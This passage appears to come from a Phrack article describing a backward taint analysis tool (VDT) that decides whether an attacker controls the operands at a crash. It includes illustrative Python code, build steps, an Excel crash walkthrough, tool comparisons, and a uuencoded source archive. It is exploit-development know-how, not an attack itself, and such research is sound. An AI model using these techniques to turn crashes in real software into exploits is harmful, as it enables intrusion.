operations will provide different results when they are performed with the
same data (or with fixed values): a XOR of the same tainted data will
give back untainted information (and with 0 is the same, and so on...), as
explained before.
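
The implicit-operand and boolean-operation rules above, as an added example
(not code from the attached project).  The mini program, the addresses and
the function names are constructed for the illustration; it compares a
tracker that models the implicit %esp / ss:[%esp] operands of push/pop with
one that only looks at the operands written in the instruction.

```python
# Added illustration (not VDT code): forward taint over a tiny constructed
# x86 program.  Registers are tracked whole, memory is tracked per byte.
# Operands: "eax" = register, ("mem", addr) = 4-byte memory, int = immediate.

STACK_TOP = 0x0012FF00          # constructed initial %esp
INPUT_BUF = 0x00405000          # constructed address of the attacker input

PROGRAM = [
    ("mov", "eax", ("mem", INPUT_BUF)),   # eax <- input       (tainted)
    ("push", "eax"),                      # ss:[esp] <- eax    (implicit dst)
    ("xor", "eax", "eax"),                # eax <- 0           (untainted)
    ("pop", "ebx"),                       # ebx <- ss:[esp]    (implicit src)
]


def propagate(program, tainted_bytes, esp=STACK_TOP, implicit=True):
    """Return (tainted registers, tainted memory bytes) after the program.

    implicit=False models a tracker that ignores %esp and ss:[%esp].
    """
    regs, mem = set(), set(tainted_bytes)

    def tainted(op):
        if isinstance(op, str):
            return op in regs
        if isinstance(op, tuple):
            return any(a in mem for a in range(op[1], op[1] + 4))
        return False                      # immediates are never tainted

    def mark(op, flag):
        if isinstance(op, str):
            (regs.add if flag else regs.discard)(op)
        else:
            for a in range(op[1], op[1] + 4):
                (mem.add if flag else mem.discard)(a)

    for mnemonic, *ops in program:
        if mnemonic == "mov":
            mark(ops[0], tainted(ops[1]))
        elif mnemonic == "push":
            esp -= 4                                  # %esp <- %esp-4
            if implicit:
                mark(("mem", esp), tainted(ops[0]))   # ss:[%esp] <- src
        elif mnemonic == "pop":
            mark(ops[0], implicit and tainted(("mem", esp)))
            esp += 4
        elif mnemonic == "xor":
            dst, src = ops
            # x ^ x is always 0, so the result no longer depends on input.
            mark(dst, dst != src and (tainted(dst) or tainted(src)))
        else:
            raise ValueError("unsupported mnemonic: " + mnemonic)
    return regs, mem


def demo():
    """Run both trackers; return (full regs, naive regs, new tainted bytes)."""
    attacker = set(range(INPUT_BUF, INPUT_BUF + 16))
    full, full_mem = propagate(PROGRAM, attacker)
    naive, _ = propagate(PROGRAM, attacker, implicit=False)
    return full, naive, full_mem - attacker


if __name__ == "__main__":
    full, naive, stack = demo()
    print("with implicit operands   :", sorted(full))
    print("explicit operands only   :", sorted(naive))
    print("tainted stack bytes added:", [hex(a) for a in sorted(stack)])
```

The tracker that ignores the implicit operands loses the input on its way
through the stack, and every push of tainted data adds four more shadow
entries, which is the growth this section describes.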

Instructions over strings also need to be tainted (many integer overflows
happen from calculations of data sizes).  The cases of tainting operations
over strings have been explained in section 2.1.1.

Tainted data will remain for a long time, also increasing the explosion
problem (to stop tracking a piece of data, it is required that this data
receives an uncontrolled value, or is deallocated somehow).

During the tracing step (explained later) the instructions are simplified
in order to speed up the analysis process.

Due to all the challenges faced by the taint analysis and to the lack of
detailed information about source data for specific file-formats and
protocols, and thus the difficulties in creating working exploits for such
cases, I decided to use a different approach.  This approach is very useful
when you already have a reproducible crash case and is named Backward Taint
Analysis.

---[ 2.2 - Backward Taint Analysis

Backward Taint Analysis is a reverse approach to the natural taint analysis
flow.  Basically, instead of getting all the input, marking it as tainted
and tracking it during the program execution, what I do is to get the
crash, validate what is of interest (which led to the application crash)
and trace back to see if it comes from input and, if so, what
modifications were performed.

This avoids the explosion of tainted data, since most of the input is
considered not tainted (and usually it is legitimate).

To do so, the process is divided into two parts:

	- A trace from a good state to the crash (incrementally dumped to a
	  file) -> Gather substantial information about the target 
	  application when it receives the input data, which is formally 
	  named 'analysis'
	- Analysis of the trace file -> Formally defined as 'verification' 
	  step, where the conclusive analysis is done

The trace step stores some useful information, like effective addresses and
data values (later used to determine what is being copied to where and how
it is being affected). Note that:

	- This is done using a WinDBG extension
	- It only supports the basic x86 instructions (so, no MMX and SSE).
	  This limits the analysis in many cases and requires extending
	  the supported instructions.  The project is being open-sourced
	  here, so I expect to receive patches.
	- Simplification of the instructions to make the next step easier

To provide the simplification it is necessary to deal with many specifics, 
like in the instruction:

	- CMPXCHG r/m32, r32 -> 'Compare EAX with r/m32. If equal, ZF is
	                         set and r32 is loaded into r/m32.
	                         Else, clear ZF and load r/m32 into
	                         AL' [17]

Such an instruction creates the need for conditional taints, since 
by controlling %eax and r32 the attacker controls r/m32 too.

Alternative taints are also provided, in the form of srcdep{1,2,3}.

Since the trace step generates a file to be loaded by the next step, this
file will contain:

	- Mnemonic of the instruction
	- Operands
	- Dependencies for the source operand

Dependencies for an operand are, for example, elements of an indirectly
addressed memory.  This will create a tree of the dataflow, with a root in
the crash instruction.

The analysis step receives the address ranges that have the attacker data 
and then does the automatic analysis to determine the control over anything
you want to know.

	- This is done by a standalone tool (it is in the same project
	  file), and has a GUI!

Since the dataflow is available in a tree rooted in the crash instruction,
the analysis step will just search in this tree, using a BFS [18]
algorithm.

Let's now look at some example code:

	1-) mov edi, 0x1234       ; dst=edi, src=0x1234
	2-) mov eax, [0xABCD]     ; dst=eax, src=ptr 0xABCD
	                          ; Note 0xABCD is evil addr
	3-) lea ebx, [eax+ecx*8]  ; dst=ebx, src=eax, srcdep1=ecx
	4-) mov [edi], ebx        ; dst=ptr 0x1234, src=ebx
	5-) mov esi, [edi]        ; dst=esi, src=ptr 0x1234, srcdep1=edi
	6-) mov edx, [esi]        ; Crash!!!

The tree will look like:

	6-) Where does [esi] come from?
	5-) [edi] is moved to esi; where does edi come from and what exists
	    in [edi]?
	4-) [edi] receives ebx and edi is defined in 1-) from a fixed value
	3-) ebx comes from a lea instruction that uses eax and ecx
	2-) eax receives a value controlled by the attacker
	... ecx is out of the scope here :)
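
The backward search described above, run over the six-instruction listing,
as an added example (not the code of the attached tool).  The tuple-based
trace records, the function names, the faulting address and the taint range
bounds are assumptions made here; sub-register aliasing (al/ax/eax) is not
modelled.

```python
from collections import deque

# Constructed trace mirroring the six-instruction listing above.  Each record
# is (text, dst, src, srcdeps); operands are ("reg", name), ("imm", value) or
# ("mem", address, size).  This layout is an assumption made for the example,
# not the VDT trace file format.
FAULT_ADDR = 0x41414141   # constructed value of esi at the crash
TRACE = [
    ("mov edi, 0x1234", ("reg", "edi"), ("imm", 0x1234), ()),
    ("mov eax, [0xABCD]", ("reg", "eax"), ("mem", 0xABCD, 4), ()),
    ("lea ebx, [eax+ecx*8]", ("reg", "ebx"), ("reg", "eax"),
     (("reg", "ecx"),)),
    ("mov [edi], ebx", ("mem", 0x1234, 4), ("reg", "ebx"), ()),
    ("mov esi, [edi]", ("reg", "esi"), ("mem", 0x1234, 4),
     (("reg", "edi"),)),
    ("mov edx, [esi]", ("reg", "edx"), ("mem", FAULT_ADDR, 4),
     (("reg", "esi"),)),
]


def defines(dst, loc):
    """True when writing `dst` changes (part of) the location `loc`."""
    if dst[0] != loc[0]:
        return False
    if loc[0] == "reg":
        return dst[1] == loc[1]
    # Memory: the two byte ranges overlap.
    return dst[1] < loc[1] + loc[2] and loc[1] < dst[1] + dst[2]


def last_definition(trace, loc, before):
    """Index of the latest instruction before `before` that wrote `loc`."""
    for i in range(before - 1, -1, -1):
        if defines(trace[i][1], loc):
            return i
    return None


def in_taint_range(loc, ranges):
    """True when a memory operand overlaps a (start, end) attacker range."""
    return loc[0] == "mem" and any(
        loc[1] < end and start < loc[1] + loc[2] for start, end in ranges)


def check_taint_of(trace, index, operand, taint_ranges):
    """BFS from `operand`, as used by trace[index], back towards the input."""
    start = (operand, index)
    parent = {start: None}            # doubles as the visited set
    queue = deque([start])
    chains, unresolved = [], []
    while queue:
        node = queue.popleft()
        loc, before = node
        if loc[0] == "imm":
            continue                  # fixed value, nothing to follow
        d = last_definition(trace, loc, before)
        if d is None:
            # Never written inside the trace: either input data or unknown.
            if in_taint_range(loc, taint_ranges):
                steps = []
                while node is not None:
                    steps.append(node[1] + 1)   # 1-based instruction number
                    node = parent[node]
                chains.append(steps[::-1])
            else:
                unresolved.append(loc)
            continue
        _, _, src, deps = trace[d]
        for nxt in (src, *deps):
            child = (nxt, d)
            if child not in parent:
                parent[child] = node
                queue.append(child)
    return {"controlled": bool(chains), "chains": chains,
            "unresolved": unresolved}


if __name__ == "__main__":
    ranges = [(0xABCD, 0xABCD + 0x100)]       # constructed attacker range
    result = check_taint_of(TRACE, 5, ("reg", "esi"), ranges)
    print("esi controlled:", result["controlled"])
    print("chain (crash -> input):", result["chains"])
    print("out of scope:", result["unresolved"])
```

The chain it reports for esi is 6, 5, 4, 3, 2, the same walk as the tree
above, with ecx left unresolved and edi ending in a fixed value.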



---[ 2.2.1 - From the crash to the exploit

In order to compile the provided project, I use Microsoft Visual Studio 
2008 for the GUI and the command line for the debugger extension (don't 
forget to install the debugger extension SDK [19]).

To compile the applications, go to the sources directory and open the 
Project in Visual Studio.

The GUI is compiled using the project build; the dll is compiled through
the command line:

	- Open the DOS prompt
	- Execute:

	  Cmd.exe /k C:\WinDDK\7600.16385.0\bin\setenv.bat 	\
	  C:\WinDDK\7600.16385.0\ chk WNET

	- Then go to the directory VDT-Tracer and execute:

		setpaths.cmd

	- On some systems you will need to open the makefile file (just 
	  open and close):

		edit makefile

	- Then, just compile:

		bcz

	- Copy the library from bin\i386\vdt-tracer.dll
	  to your WinDBG extensions directory 


Attached to the article there is an Excel file for a problem discovered by 
accident two years ago (the problem was discovered during a Forensic 
Analysis by a friend of mine, who after recovering an Excel Spreadsheet 
noticed that Excel was crashing when trying to open it).  
The name of the file is FIL573.XLS.

The problem was fixed more than a year ago, but it is useful to illustrate
the steps taken in order to use this project.  As mentioned, I'm not going 
to discuss the analysis step, but I'll just show how to get the tool to
work... the rest is up to you!  

First, open Excel, and attach to it using WinDBG [Figure
WinDBG_Attaching_to_Excel].  Add a breakpoint on CreateFile [Figure
WinDBG_Breakpoint_CreateFile].

Start the tracing process [Figure WinDBG_Trace_VDT].

Open the crash file within Excel [Figure Opening_Crash_File_Excel].

Using a hex editor (in my case I used xvi32) open the file and try to
locate a string that you can search for in the program's memory, to
determine where the file was loaded [Figure Finding_User_Input_in_Memory].

Using the searching capabilities of WinDBG, locate that string in the
program's memory [Figure WinDBG_Finding_User_Input_in_Memory].

Open the trace file in the GUI [Figure VDT_Open_Trace_File] and add a taint
range like in [Figure VDT_Add_Taint_Range] and
[Figure VDT_Add_Taint_Range2].

Now everything is ready, and you will have the taint analysis of the
instructions you are interested in, related to the range of memory you just
specified.

Right-click any instruction [Figure VDT_Check_Taint_Of] and
see the Check Taint Of option [Figure VDT_Check_Taint_Of2].  It is going to
offer the taint information for all applicable operands
[Figure VDT_Check_Taint_Of3].


------[ 3 - Existent solutions and comparisons


Microsoft Research released the !exploitable [3] extension for Microsoft
Debugger and its source code.  This is a great initiative and contributed a
lot to the growing cooperation between researchers and the software
industry (since now the vendors can at least classify the exploitability of
each reported vulnerability).  Although it fails in many cases to classify
the exploitability, it provides good extensibility support and is a good
starting point in this initiative.
It is important to note as well that a good aim of the tool is to identify
unique bugs, eliminating duplicated issues.

A simple example of the problem with such an approach is:

_declspec(naked) int main() {
	_asm {
		mov eax, 0x41414141
		call eax
	}
}

This is incorrectly classified as EXPLOITABLE because the tool always
assumes that the attacker has control over all the input operands
[Figure bangexploitablefp.jpg].
This is not the case in the example.  The solution provided in
this article differs from that, since instead of trying to classify the
exploitability, I try to save researcher time while analyzing
vulnerabilities and determining exactly that limitation:  Are the input
operands under the control of the attacker?

So, to summarize, bang exploitable (!exploitable) objectives are:

	- Classify unique issues (crashes appearing through different code
	  paths, machines involved in testing, and in multiple different
	  test cases)
	- Quickly prioritize issues (since crashes appear in thousands,
	  while analysis capabilities are VERY limited)
	- Grouping the crashes for analysis

And the objective of the provided tool is:

	- Helping you to create the exploit code :)

Piotr Bania released a paper about an architecture for similar analysis,
called Spiderpig [20], providing more advanced cases.  The Spiderpig
project is not available for testing, making it impossible to create a fair
comparison.  In Piotr's paper, he explains the Virtual Code Integration (or
Dynamic Binary Rewriting) approach.  Some of the techniques used in the
'intermediate language representation' phases are also adopted in the
provided tool, in a different way (there is no intermediate language, but a
normalized output of the execution trace).  Spiderpig has ways to solve
specific conflicts in partially controlled data, creating what he named a
disputable object.  In those objects, parent objects are also available for
analysis.  After reviewing the algorithms provided in the article,
Spiderpig seems to be much more advanced than the provided tool, but as
said, is not available.

Taint Check [21] is dependent on DynamoRIO or Valgrind and is an extension
to provide taint analysis in order to detect overflow conditions in tested
software.  It does not help in the exploit-creation phase, nor in
determining the actual exploitability of an issue.  It is divided into
taint-seed, taint-tracker and taint-assert, with the purpose of defining
the original tainted values (values coming from the network for example),
tracking the propagation and alerting about security violations
respectively.
Because they provide a solution for security-tests I decided to also
include a heap-monitoring example tool with this article.  This tool aims
at solving the challenge of heap tests for embedded Linux architectures
using ARM (much less advanced than the Valgrind Memcheck plugin,
although the only option for ARM as far as the author is aware).

The solution provided here started when I first faced the problem of 
exploiting a complex client-side vulnerability, involving a very complex 
(and at that time closed) file format.  It was later expanded when I saw 
the results of attacking scenarios against Word [1] and started to think 
how to automate the analysis in order to determine the exploitability.

My initial version was integrated with a fuzzer to provide internal
information and feed back the fuzzer in order to have better coverage of
the critical parts of the software [22]. It was Unix-based and
later ported to cover Solaris too, in order to exploit two vulnerabilities
released by Secunia [23] in the same software where RISE Security found a
vulnerability some months before.

Because a good friend of mine was doing research in the same area, and had
good experience with the Microsoft Debugger, we decided to integrate our
implementations and create the final version provided here.  I have kept
expanding this version since then and using it in my work and personal
projects.

The biggest difference here is that we provide the backward Taint Analysis
in order to help the exploitation process, which means we focus on
determining what the attacker controls from the crash back to the input
data.


------[ 4 - Future and other uses

I can't foresee the future.  I hope that more researchers are going to
contribute to the project, helping it to grow and achieve maturity.

The code needs immediate support for extended coverage of x86 instructions,
speed enhancements, and the introduction of heuristic detection of user
input (so you don't need to manually specify the memory ranges to watch).

I'm sure many other uses are possible, and for sure I do expect some
extensions to come.

The original idea was based on Valgrind and REX intermediate language.  The
available version is based on Microsoft Debugger (but really tied to it
due to the limited amount of time to create the project).

A limitation of such an approach is the fact that you need the PoC to trace
the execution until the crash, and then to analyze it backwards.  If your
PoC is not taking a specific execution path that gives you control over
some specific memory areas, the analysis will say you don't control such
memory areas.  The tool does not try to find other ways to get control over
areas that you need; it only tells you whether or not you control such
areas, based on the executed PoC.

There are other areas of interest, like heap viewing [24].  A
heap view example for Linux ARM is also available with the article and
future versions on Sourceforge [25].

Also, the integration with fuzzers [22]
is an interesting approach to provide better ways to find security
vulnerabilities.


------[ 5 - Acknowledgments

A lot of people helped me along the long way of this research, which
resulted in something interesting (at least to me) to be published; you all
know who you are.

The biggest thanks goes to Julio Auto, for helping me with the tools and 
for having the motivation to go present alone [26] while I was still 
fighting to get permissions to release everything in my personal name.

Special tks to the Phrack Staff for the great review of the article, giving  
a lot of important insights about how to better structure it and giving a 
real value to it.

I'll never ever forget to say thanks to my research team and friends at
RISE Security (http://www.risesecurity.org) for always keeping me motivated
studying completely new things.   

Thanks to the conference organizers who invited me to talk about Software
Exploitation: even after many people had already talked about the subject,
they trusted that my talk was not more of the same.

It's impossible to not say thanks to COSEINC, an amazing place for hackers  
to work and which provided me lots of motivation to keep my projects going  
on my free time.

A big thanks goes to Check Point Software Technologies, for paying me to 
keep doing my hobby ;)


------[ 6 - References
[1] Nagy, Ben. "Finding Microsoft Vulnerabilities by Fuzzing Binary Files
with Ruby - A New Fuzzing Framework"; Syscan 2009

[2] Miller, Charlie. "Babysitting an Army of Monkeys: An analysis of fuzzing 
4 products with 5 lines of Python"; Cansecwest 2010
http://securityevaluators.com/files/slides/cmiller_CSW_2010.ppt

[3] Microsoft !exploitable page
http://msecdbg.codeplex.com

[4] Abouchaev, Adel; Hasse, Damian; Lambert, Scott; Wroblewski, Greg. 
"Analyze crashes to find security vulnerabilities in your apps"

[5] Barbosa, Edgar. "Taint Analysis"; H2HC 2009
http://www.h2hc.com.br/repositorio/2009/Edgar.pdf

[6] Chow, Jin. "Understanding data lifetime via whole system emulation";
Usenix 2004

[7] Denning, Dorothy; Denning, Peter. "Certification of Programs for Secure 
Information Flow"

[8] Klee Project
http://keeda.stanford.edu/wiki/klee-install

[9] Godefroid, Patrice; Levin, Michael; Molnar, David. "Automated Whitebox 
Fuzz Testing"
http://research.microsoft.com/en-us/projects/atg/ndss2008.pdf

[10] Molnar, David; Wagner, David. "Catchconv: Symbolic execution and  
run-time type inference for integer conversion errors"

[11] Wille, Andre; Drechsler, Daniel. "Evaluation of SAT like Proof
Techniques for Formal Verification of Word Level Circuits"

[12] de Moura, Leonardo; Bjorner, Nikolaj. "Z3: An Efficient SMT Solver"

[13] Z3 Project - Microsoft Research
http://research.microsoft.com/en-us/um/redmond/projects/z3/

[14] ERESI Project
http://www.eresi-project.org/

[15] Valgrind Project
http://www.valgrind.org

[16] Porst, Sebastian. "Applications of the Reverse Engineering Language 
REIL"
http://www.h2hc.com.br/repositorio/2009/Sebastian.pdf

[17] Intel Manual 
http://www.intel.com/software/products/documentation/vlin/mergedprojects/analyzer_ec/mergedprojects/reference_olh/mergedProjects/instructions/instruct32_hh/vc42.htm

[18] BFS algorithm
http://en.wikipedia.org/wiki/Breadth-first_search

[19] Microsoft Debugger SDK
http://www.microsoft.com/whdc/devtools/debugging/default.mspx

[20] Bania, Piotr.  "Dynamic Data Flow Analysis via Virtual Code 
Integration (aka The SpiderPig case)"
http://piotrbania.com/all/spiderpig/pbania-spiderpig2008.pdf

[21] Newsome, James; Song, Dawn. "Dynamic Taint Analysis for Automatic 
Detection, Analysis, and Signature Generation of Exploits on Commodity
Software"
http://valgrind.org/docs/newsome2005.pdf

[22] Branco, Rodrigo. "Letting your fuzzer know about target's internals"
http://www.troopers10.org

[23] Secunia Advisory SA32473. "Sun Solaris Sadmin Two Vulnerabilities"
http://secunia.com/advisories/32473/

[24] Core Security Technologies. "Heap Draw / Heap Tracer"
http://oss.coresecurity.com/projects/heapdraw.html

[25] JFree Project
http://www.sf.net/projects/jfree

[26] Auto, Julio. "Triaging Bugs with Dynamic Dataflow Analysis";
Source Barcelona 2009
www.julioauto.com/presentations/sourcebcn09_TBwDDA.ppt


------[ 7 - Sources [vdt_jfree.tgz]

---------------------------------------------------------------------------
Attached to the article there is:
	- VDT Project:  The main project cited in the article, it is a
	  Microsoft Debugger extension and a GUI used to analyze crash
	  files in order to create an exploit code
	- Jfree project:  It is a Linux-ARM Heap Monitoring System created
	  long ago and also available at [25]
	- Images directory:  Some screenshots of the program and plugin of
	  the VDT Project.

Further updates will be available in the RISE Security website at:
	http://www.risesecurity.org

For the author's public key:
	http://www.kernelhacking.com/rodrigo/docs/public.txt

begin 644 vdt_jfree.tgz
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
